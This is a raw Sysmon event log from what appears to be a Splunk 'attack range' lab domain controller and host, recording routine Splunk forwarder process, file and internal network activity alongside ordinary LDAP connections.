11:18:03.714{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-17EB-6216-3907-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000297740Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.716{C8EA50B7-17EB-6216-3907-000000003802}6952C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000297739Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.381{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C2476A94CA6C22D8096DD96C261897E3,SHA256=DA47DBE559C23993ECD55709558430725F328DBD93890C6A9C1AF45D253A3A3A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221629Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:03.639{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BA7AC523774281BADB1B4D823E0AAB2,SHA256=FFBA0AAE8C6818CB9D07DA8F396B2CDF84587DBFF73F790245839113326D93AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221630Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:04.671{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713C162D66F0DA9AF9879D19915220BD,SHA256=F352CA53AA9BC362138BF2878021F6DE9E7DA76927B6954E77A1D206DFB47AC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297748Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:04.402{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2A6DB25E08F329EC946288E18C4ABAE5,SHA256=5D78408EBC5678738BE6E0CE1E2A907834F2FC93FE1C730EF631983210E98806,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221632Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:05.811{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5340DB29216C9E7562B036E7F4CA0D3,SHA256=F87D80D482771F737AE4469E547C0E967358B2C40E68990FB430050C682858D6,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297751Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.477{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49476-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000297750Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:03.477{C8EA50B7-F130-6215-2C00-000000003802}2420C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local49476-true0:0:0:0:0:0:0:1win-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000297749Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:05.404{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F472B4C584CD57C90FDFEBA7E2242B1F,SHA256=8759F7CC2EE499B09C20981ED377AA8A9DE05365538D58D118FD2FE9CBF4E0BB,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221631Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:02.685{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51662-false10.0.1.12-8000- 23542300x8000000000000000297752Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:06.487{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59C82FB821FA159EE252850AE1DA7EDD,SHA256=1965E8BBFEDB214955A724CF49BC4D597CABB5BAF71D0DF82BAFCD64B9273332,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297753Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:07.502{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5F0E349B60D83065FAA999845E3067C4,SHA256=0FF767C49B244384B4AEDA65899F7FB98D56EF9B58B11FEB8DC334951BED2CF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221633Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:07.030{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=36548A413C9FF861AF86F5BA1AAC80EE,SHA256=05134C4AE29879E5787C1A91F454750EE24E81C1DEB4864BCA6DC1331E53CF4B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297754Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:08.518{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D8F91FC00BE9DF626FD90661905658F,SHA256=3E31EA54E958583A271472658EB02C752D4038F99E9BF9BCD7012A9608034753,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221634Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:08.155{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9B70F7BF1D60623D2FB17B2AA5613D8,SHA256=4C5D25A61E3CD2E9ED80F6D906B0131DAC75F61A04192444F824187554D2C3D5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221635Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:09.389{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7290B49043053844FBD2071407B2BC54,SHA256=1249F456C54FBC1F0DE4F8785D324DAC4FA0B8343267498D08A5E4C4AB308B3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297756Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:09.518{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=00BA35FE970F47BDFE26E2DB7329FC90,SHA256=B840FBC7B1CBCACABD932FAF180C86AAF90AC482B9ABAD5934ED1FB90539E54F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297755Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:06.607{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49477-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297757Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:10.534{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7E0F23C154F1C6EA1BCA994883D90EF,SHA256=41F17841375D6572AD697119AD952B5F71EEE140F5A96A00A7EA89C901DF99E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221637Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:08.466{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51663-false10.0.1.12-8000- 23542300x8000000000000000221636Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:10.436{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=919256C005DB82D5537E3D92D9E0DE3D,SHA256=52181F3B9B9F207CFB8D7E49EE4C16561C624B5EDB2916A5976A53B777DAF466,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297758Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:11.549{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F1EDF2BC64CFDC6E57EF9EBAD3F4F44,SHA256=D99FC9481AC17A5A91E9B159265A468793916A0A3E254C6BFEC314B6F5C34E99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221638Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:11.452{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BDCC42FB53914DD0632C91A550030E1B,SHA256=2E337B76D08E26EFD21594AE5D2810DE2C0FDCA50FFFBA354F6DBF484FF00770,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297759Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:12.564{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0705E0B2FFA5668C1222F7AD623F942D,SHA256=11949F4A0CF7C4F5C1BE4B5BBEF8E91A63451BA3DD1F721106A75A3B73471B25,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221639Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:12.467{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F293E0A26C2918CFE67DDF21AFA7A293,SHA256=CF0A6A2999BB2BA087DDA256CBBCDE279BE910EA56466A1D037D63BB540A1BAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000297761Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:11.706{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49478-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000297760Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:13.564{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B85F5040C0E8D5E3C75228781C23526A,SHA256=42F5BE5D40F779F7BA92B225EBEA223AB5FB668C110C2F54F5A41B41E0CE27D3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221640Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:13.470{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F25D92CF6C6D847F6CFADB4175C2B5A8,SHA256=141F0211ECED5185108CC765D990A89E449E1B496D7AFCD1B2963244D46231BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297762Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:14.585{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B871B4FDE7FB887ED15F40810F7A8BA5,SHA256=932FEE3A04CB0510A6C7BE25075A52B50B6FF305EB0DBEAD3A9F92901CBC4A52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221641Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:14.483{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=852343B232CFE160ED599B9A579D228C,SHA256=93481C408C3F06B828D63CC1DFA279DAEAEC53F07249BE754388342644ABA62C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297763Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:15.608{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E512C02A79B49023E7230274A538774,SHA256=7C4CEFD7D6D49CEE75DE9E37712F632960BEEA966E061059E9C9F18AF3301545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221642Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:15.498{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=690AA19B39C71F01B7EABFD895E314AB,SHA256=00CBEBF2FC28132F67D8623EC12E300E044F8D1BDF587061AF4C1BC2BA1CF452,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297764Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:16.639{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F203FD6F4D38CDD95E947D41A04791CD,SHA256=B417A1CF4D4D50D726187C96CCF615F9D6F9CB14956C76FC62684F3EB8EF8780,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221644Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:16.608{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=657DE0EFB3ECA9A1CB4D5FE7580B3F56,SHA256=4F010EBEBE72440DEBD8E92189E86A3FCE03BB849997776BA678C03BD22DF07A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000221643Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:13.607{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51664-false10.0.1.12-8000- 23542300x8000000000000000297765Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:17.669{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=11EA8D68FB609429273B28B385E7B7C7,SHA256=4AB9F02E0B703378EE74AFAD9096DB1573722B9E3D9A12884B91840DEFE6E299,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221645Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:17.842{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=610181DC034CD1267849D04CFE25D6D5,SHA256=FD02BA7B43A0406F4F93A2632F791B3CBDCB39FE0CDA58DA9C238BE52DC39542,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297766Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:18.688{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C65C831CD6440F68790341BBB49152C,SHA256=BFC2322C9AD9A70F688101254DC3DFF8537C170DE501778BF4D41E6FF202B56D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221646Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:18.936{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2956DF0204F1A39566589ADB74061200,SHA256=5F95F7A27030D4D86ACFED06FF40AE4ECEEFFE62C3706B0FA34FD3AC24921EF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000221647Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:18:19.967{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C8358EA92480EB4D2B0DC4E8A105956,SHA256=5C1654661EE2B1BCCF759FC51D433290AEC4991BE0A4A7F71847A84529B91C3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000297776Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.737{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ABC741DBAF61E9085A2897140F15F1FA,SHA256=B7EBF9DC54AA2061408736DF9D62D83C6A5E0D4E383E444F6125041E65F91E10,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000297775Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.606{C8EA50B7-17FB-6216-3A07-000000003802}65082052C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297774Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-17FB-6216-3A07-000000003802}6508C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297773Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:18:19.322{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000297772Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 